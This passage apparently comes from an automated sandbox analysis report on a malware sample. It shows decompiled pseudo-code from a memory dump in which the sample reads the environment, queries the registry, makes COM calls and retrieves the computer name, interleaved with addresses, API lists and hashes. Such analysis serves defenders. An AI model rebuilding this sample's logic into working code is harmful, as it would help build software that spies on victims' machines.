                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                                            				WCHAR* _t85;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v88 = 0;
                                                                                                                                                                                                                                                            				memset( &_v84, 0, 0x2c);
                                                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				_t40 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t5 = _t40 + 0x487ee34; // 0x410025
                                                                                                                                                                                                                                                            				_t85 = E04876FDA(_t5);
                                                                                                                                                                                                                                                            				_v16 = _t85;
                                                                                                                                                                                                                                                            				if(_t85 == 0) {
                                                                                                                                                                                                                                                            					_t80 = 8;
                                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                                            					return _t80;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                                                                                                                                                                                                                            				if(_t45 != 0) {
                                                                                                                                                                                                                                                            					_t80 = 1;
                                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                                            					E048770FF(_v16);
                                                                                                                                                                                                                                                            					goto L24;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(E04876C01(0,  &_a4) != 0) {
                                                                                                                                                                                                                                                            					_a4 = 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t50 = E0487A0DB(0,  *0x487d33c);
                                                                                                                                                                                                                                                            				_v12 = _t50;
                                                                                                                                                                                                                                                            				if(_t50 == 0) {
                                                                                                                                                                                                                                                            					_t80 = 8;
                                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t52 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            					_t11 = _t52 + 0x487e81a; // 0x65696c43
                                                                                                                                                                                                                                                            					_t55 = E0487A0DB(0, _t11);
                                                                                                                                                                                                                                                            					_t87 = _t55;
                                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                                            						_t80 = 8;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t80 = E04876E8F(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                                                                                                                                                                                                                            						E048770FF(_t87);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t80 != 0) {
                                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                                            						E048770FF(_v12);
                                                                                                                                                                                                                                                            						L19:
                                                                                                                                                                                                                                                            						_t86 = _a4;
                                                                                                                                                                                                                                                            						if(_a4 != 0) {
                                                                                                                                                                                                                                                            							E0487A3B5(_t86);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						if(( *0x487d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                                            							E04871CC0(_t80, _v88, _v84,  *0x487d270, 0);
                                                                                                                                                                                                                                                            							_t80 = E04873E70(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                                            								_v24 = _a4;
                                                                                                                                                                                                                                                            								_v20 =  &_v88;
                                                                                                                                                                                                                                                            								_t80 = E048728C2( &_v40, 0);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							E048770FF(_v88);
                                                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t67 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t18 = _t67 + 0x487e823; // 0x65696c43
                                                                                                                                                                                                                                                            						_t70 = E0487A0DB(0, _t18);
                                                                                                                                                                                                                                                            						_t89 = _t70;
                                                                                                                                                                                                                                                            						if(_t70 == 0) {
                                                                                                                                                                                                                                                            							_t80 = 8;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t80 = E04876E8F(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                                                                                                                                                                                                                            							E048770FF(_t89);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_t80 != 0) {
                                                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                            0x04872067
                                                                                                                                                                                                                                                            0x0487206a
                                                                                                                                                                                                                                                            0x04872071
                                                                                                                                                                                                                                                            0x04872077
                                                                                                                                                                                                                                                            0x04872078
                                                                                                                                                                                                                                                            0x04872079
                                                                                                                                                                                                                                                            0x0487207a
                                                                                                                                                                                                                                                            0x0487207b
                                                                                                                                                                                                                                                            0x0487207c
                                                                                                                                                                                                                                                            0x04872084
                                                                                                                                                                                                                                                            0x04872090
                                                                                                                                                                                                                                                            0x04872094
                                                                                                                                                                                                                                                            0x04872097
                                                                                                                                                                                                                                                            0x048721e7
                                                                                                                                                                                                                                                            0x048721ea
                                                                                                                                                                                                                                                            0x048721ee
                                                                                                                                                                                                                                                            0x048721ee
                                                                                                                                                                                                                                                            0x048720a9
                                                                                                                                                                                                                                                            0x048720b1
                                                                                                                                                                                                                                                            0x048721da
                                                                                                                                                                                                                                                            0x048721db
                                                                                                                                                                                                                                                            0x048721de
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048721de
                                                                                                                                                                                                                                                            0x048720c3
                                                                                                                                                                                                                                                            0x048720c5
                                                                                                                                                                                                                                                            0x048720c5
                                                                                                                                                                                                                                                            0x048720d0
                                                                                                                                                                                                                                                            0x048720d7
                                                                                                                                                                                                                                                            0x048720da
                                                                                                                                                                                                                                                            0x048721c9
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048720e0
                                                                                                                                                                                                                                                            0x048720e0
                                                                                                                                                                                                                                                            0x048720e5
                                                                                                                                                                                                                                                            0x048720ee
                                                                                                                                                                                                                                                            0x048720f3
                                                                                                                                                                                                                                                            0x048720fc
                                                                                                                                                                                                                                                            0x0487211f
                                                                                                                                                                                                                                                            0x048720fe
                                                                                                                                                                                                                                                            0x04872114
                                                                                                                                                                                                                                                            0x04872116
                                                                                                                                                                                                                                                            0x04872116
                                                                                                                                                                                                                                                            0x04872122
                                                                                                                                                                                                                                                            0x048721bd
                                                                                                                                                                                                                                                            0x048721c0
                                                                                                                                                                                                                                                            0x048721ca
                                                                                                                                                                                                                                                            0x048721ca
                                                                                                                                                                                                                                                            0x048721cf
                                                                                                                                                                                                                                                            0x048721d1
                                                                                                                                                                                                                                                            0x048721d1
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872128
                                                                                                                                                                                                                                                            0x0487212f
                                                                                                                                                                                                                                                            0x04872170
                                                                                                                                                                                                                                                            0x04872181
                                                                                                                                                                                                                                                            0x04872197
                                                                                                                                                                                                                                                            0x0487219b
                                                                                                                                                                                                                                                            0x048721a0
                                                                                                                                                                                                                                                            0x048721a6
                                                                                                                                                                                                                                                            0x048721b3
                                                                                                                                                                                                                                                            0x048721b3
                                                                                                                                                                                                                                                            0x048721b8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048721b8
                                                                                                                                                                                                                                                            0x04872131
                                                                                                                                                                                                                                                            0x04872136
                                                                                                                                                                                                                                                            0x0487213f
                                                                                                                                                                                                                                                            0x04872144
                                                                                                                                                                                                                                                            0x04872148
                                                                                                                                                                                                                                                            0x0487216b
                                                                                                                                                                                                                                                            0x0487214a
                                                                                                                                                                                                                                                            0x04872160
                                                                                                                                                                                                                                                            0x04872162
                                                                                                                                                                                                                                                            0x04872162
                                                                                                                                                                                                                                                            0x0487216e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487216e
                                                                                                                                                                                                                                                            0x04872122

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 0487206A
                                                                                                                                                                                                                                                              • Part of subcall function 04876FDA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04872090,00410025,00000005,?,00000000), ref: 04876FEB
                                                                                                                                                                                                                                                              • Part of subcall function 04876FDA: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04877008
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 0487209E
                                                                                                                                                                                                                                                            • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 048720A9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3817122888-0
                                                                                                                                                                                                                                                            • Opcode ID: 7e286af933f8a5aef78e7cca19a85113b52dda12487942fa89336b570eb20c2a
                                                                                                                                                                                                                                                            • Instruction ID: 18859f48a7dc11d3300b7ee09207f0407263e297eb3c46f6c8fb9181a1f34cfa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e286af933f8a5aef78e7cca19a85113b52dda12487942fa89336b570eb20c2a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30413372A00118ABEB11AFE8CCA4DEE7BBCFF04354B044E65EA05E7110E6B5FD4597A1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                                            			E04872681(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                            				intOrPtr* _t41;
                                                                                                                                                                                                                                                            				intOrPtr* _t43;
                                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                                            				intOrPtr* _t50;
                                                                                                                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                                            				intOrPtr* _t57;
                                                                                                                                                                                                                                                            				intOrPtr* _t61;
                                                                                                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t55 = _a4;
                                                                                                                                                                                                                                                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                                            				_a4 = 0;
                                                                                                                                                                                                                                                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                                            				if(_t76 < 0) {
                                                                                                                                                                                                                                                            					L18:
                                                                                                                                                                                                                                                            					return _t76;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t40 = E0487126F(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                                            				_t76 = _t40;
                                                                                                                                                                                                                                                            				if(_t76 >= 0) {
                                                                                                                                                                                                                                                            					_t61 = _a28;
                                                                                                                                                                                                                                                            					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                                            						_t52 = _v8;
                                                                                                                                                                                                                                                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t76 >= 0) {
                                                                                                                                                                                                                                                            						_t43 =  *_t55;
                                                                                                                                                                                                                                                            						_t68 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t20 = _t68 + 0x487e1fc; // 0x740053
                                                                                                                                                                                                                                                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                                            						if(_t76 >= 0) {
                                                                                                                                                                                                                                                            							_t76 = E04872A17(_a4);
                                                                                                                                                                                                                                                            							if(_t76 >= 0) {
                                                                                                                                                                                                                                                            								_t65 = _a28;
                                                                                                                                                                                                                                                            								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                                            									_t50 = _a4;
                                                                                                                                                                                                                                                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t45 = _a4;
                                                                                                                                                                                                                                                            						if(_t45 != 0) {
                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t57 = __imp__#6;
                                                                                                                                                                                                                                                            						if(_a20 != 0) {
                                                                                                                                                                                                                                                            							 *_t57(_a20);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                                            							 *_t57(_a12);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t41 = _v8;
                                                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                                            				goto L18;
                                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                                            0x04872687
                                                                                                                                                                                                                                                            0x0487268a
                                                                                                                                                                                                                                                            0x0487269a
                                                                                                                                                                                                                                                            0x048726a3
                                                                                                                                                                                                                                                            0x048726a7
                                                                                                                                                                                                                                                            0x04872775
                                                                                                                                                                                                                                                            0x0487277b
                                                                                                                                                                                                                                                            0x0487277b
                                                                                                                                                                                                                                                            0x048726c1
                                                                                                                                                                                                                                                            0x048726c6
                                                                                                                                                                                                                                                            0x048726ca
                                                                                                                                                                                                                                                            0x048726d0
                                                                                                                                                                                                                                                            0x048726d5
                                                                                                                                                                                                                                                            0x048726dc
                                                                                                                                                                                                                                                            0x048726eb
                                                                                                                                                                                                                                                            0x048726eb
                                                                                                                                                                                                                                                            0x048726ef
                                                                                                                                                                                                                                                            0x048726f1
                                                                                                                                                                                                                                                            0x048726fd
                                                                                                                                                                                                                                                            0x04872708
                                                                                                                                                                                                                                                            0x04872713
                                                                                                                                                                                                                                                            0x04872717
                                                                                                                                                                                                                                                            0x04872721
                                                                                                                                                                                                                                                            0x04872725
                                                                                                                                                                                                                                                            0x04872727
                                                                                                                                                                                                                                                            0x0487272c
                                                                                                                                                                                                                                                            0x04872733
                                                                                                                                                                                                                                                            0x04872743
                                                                                                                                                                                                                                                            0x04872743
                                                                                                                                                                                                                                                            0x0487272c
                                                                                                                                                                                                                                                            0x04872725
                                                                                                                                                                                                                                                            0x04872745
                                                                                                                                                                                                                                                            0x0487274a
                                                                                                                                                                                                                                                            0x0487274f
                                                                                                                                                                                                                                                            0x0487274f
                                                                                                                                                                                                                                                            0x04872755
                                                                                                                                                                                                                                                            0x0487275b
                                                                                                                                                                                                                                                            0x04872760
                                                                                                                                                                                                                                                            0x04872760
                                                                                                                                                                                                                                                            0x04872765
                                                                                                                                                                                                                                                            0x0487276a
                                                                                                                                                                                                                                                            0x0487276a
                                                                                                                                                                                                                                                            0x04872765
                                                                                                                                                                                                                                                            0x048726ef
                                                                                                                                                                                                                                                            0x0487276c
                                                                                                                                                                                                                                                            0x04872772
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0487126F: SysAllocString.OLEAUT32(80000002), ref: 048712C6
                                                                                                                                                                                                                                                              • Part of subcall function 0487126F: SysFreeString.OLEAUT32(00000000), ref: 0487132B
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 04872760
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(04871973), ref: 0487276A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$Free$Alloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 986138563-0
                                                                                                                                                                                                                                                            • Opcode ID: 4cd00ff9cd813e1bd55dfd2c9bc339e61e85d2582d73996e0619d62c6673047f
                                                                                                                                                                                                                                                            • Instruction ID: d8b88139e0c116e576aeb4aeed3ae204156413bea691aa2c4091ebebf9fa8d10
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cd00ff9cd813e1bd55dfd2c9bc339e61e85d2582d73996e0619d62c6673047f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B314B76500118AFCB11DFA8C998C9BBB7AFFC97807144A98F915DB220E771ED51CBA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                            			E04873CCD(void* __ecx) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t23 = __imp__;
                                                                                                                                                                                                                                                            				_t20 = 0;
                                                                                                                                                                                                                                                            				_v8 = _v8 & 0;
                                                                                                                                                                                                                                                            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                                            				_t10 = _v8;
                                                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                                                            					_t20 = E048716F8(_t10 + 1);
                                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                                            						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                                            						if(_t15 != 0) {
                                                                                                                                                                                                                                                            							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							E048770FF(_t20);
                                                                                                                                                                                                                                                            							_t20 = 0;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t20;
                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                            0x04873cd2
                                                                                                                                                                                                                                                            0x04873cdd
                                                                                                                                                                                                                                                            0x04873cdf
                                                                                                                                                                                                                                                            0x04873ce5
                                                                                                                                                                                                                                                            0x04873ce7
                                                                                                                                                                                                                                                            0x04873cec
                                                                                                                                                                                                                                                            0x04873cf5
                                                                                                                                                                                                                                                            0x04873cf9
                                                                                                                                                                                                                                                            0x04873d02
                                                                                                                                                                                                                                                            0x04873d06
                                                                                                                                                                                                                                                            0x04873d15
                                                                                                                                                                                                                                                            0x04873d08
                                                                                                                                                                                                                                                            0x04873d09
                                                                                                                                                                                                                                                            0x04873d0e
                                                                                                                                                                                                                                                            0x04873d0e
                                                                                                                                                                                                                                                            0x04873d06
                                                                                                                                                                                                                                                            0x04873cf9
                                                                                                                                                                                                                                                            0x04873d1e

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000003,00000000,04878DB0,73BCF710,00000000,?,?,04878DB0), ref: 04873CE5
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000003,00000000,04878DB0,04878DB1,?,?,04878DB0), ref: 04873D02
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 187446995-0
                                                                                                                                                                                                                                                            • Opcode ID: 35d763e2ccf056773a6f6f99b4a419f89f90bddaa858986cb23b07ed0c702e0d
                                                                                                                                                                                                                                                            • Instruction ID: 2340f8e3b3920878a165bc49fd88296b0230ab6be5675848d1d9061711a8ecd9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35d763e2ccf056773a6f6f99b4a419f89f90bddaa858986cb23b07ed0c702e0d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5F0B436600109FBE711D69A8C14EAF3BBEDBC1644F214565A900D3100EA70FE01E7B2
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t14 = 1;
                                                                                                                                                                                                                                                            				_t4 = _a8;
                                                                                                                                                                                                                                                            				if(_t4 == 0) {
                                                                                                                                                                                                                                                            					if(InterlockedDecrement(0x487d23c) == 0) {
                                                                                                                                                                                                                                                            						E04877239();
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					if(_t4 == 1 && InterlockedIncrement(0x487d23c) == 1) {
                                                                                                                                                                                                                                                            						_t10 = E04879A11(_t11, _t12, _a4); // executed
                                                                                                                                                                                                                                                            						if(_t10 != 0) {
                                                                                                                                                                                                                                                            							_t14 = 0;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                            0x04877e63
                                                                                                                                                                                                                                                            0x04877e64
                                                                                                                                                                                                                                                            0x04877e67
                                                                                                                                                                                                                                                            0x04877e99
                                                                                                                                                                                                                                                            0x04877e9b
                                                                                                                                                                                                                                                            0x04877e9b
                                                                                                                                                                                                                                                            0x04877e69
                                                                                                                                                                                                                                                            0x04877e6a
                                                                                                                                                                                                                                                            0x04877e7f
                                                                                                                                                                                                                                                            0x04877e86
                                                                                                                                                                                                                                                            0x04877e88
                                                                                                                                                                                                                                                            0x04877e88
                                                                                                                                                                                                                                                            0x04877e86
                                                                                                                                                                                                                                                            0x04877e6a
                                                                                                                                                                                                                                                            0x04877ea3

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(0487D23C), ref: 04877E71
                                                                                                                                                                                                                                                              • Part of subcall function 04879A11: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04877E84,?), ref: 04879A24
                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(0487D23C), ref: 04877E91
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3834848776-0
                                                                                                                                                                                                                                                            • Opcode ID: 72e3d656854bd228b2da2c29464ee26b4bf08ea5092eb99d542c0ac838c4fdbb
                                                                                                                                                                                                                                                            • Instruction ID: e658c994e58ad8a47f09c38740dae1b1c4f67833b13d75deb635faab363903b4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72e3d656854bd228b2da2c29464ee26b4bf08ea5092eb99d542c0ac838c4fdbb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EE04F33B4422197A7212AF5DC78B7AEB529F01F84F824F15F585D1120E654FC81E6D2
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 34%
                                                                                                                                                                                                                                                            			E04877082(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				void* _v18;
                                                                                                                                                                                                                                                            				short _v20;
                                                                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                                                                            				short _t17;
                                                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                                                            				short _t23;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t23 = 0;
                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosw");
                                                                                                                                                                                                                                                            				_t15 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t4 = _t15 + 0x487e39c; // 0x5258944
                                                                                                                                                                                                                                                            				_t20 = _t4;
                                                                                                                                                                                                                                                            				_t6 = _t15 + 0x487e124; // 0x650047
                                                                                                                                                                                                                                                            				_t17 = E04872681(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                                            				if(_t17 < 0) {
                                                                                                                                                                                                                                                            					_t23 = _t17;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					if(_v20 != 8) {
                                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t19 = E04871788(_t20, _v12);
                                                                                                                                                                                                                                                            						if(_t19 == 0) {
                                                                                                                                                                                                                                                            							_t23 = 8;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							 *_a16 = _t19;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						__imp__#6(_v12);
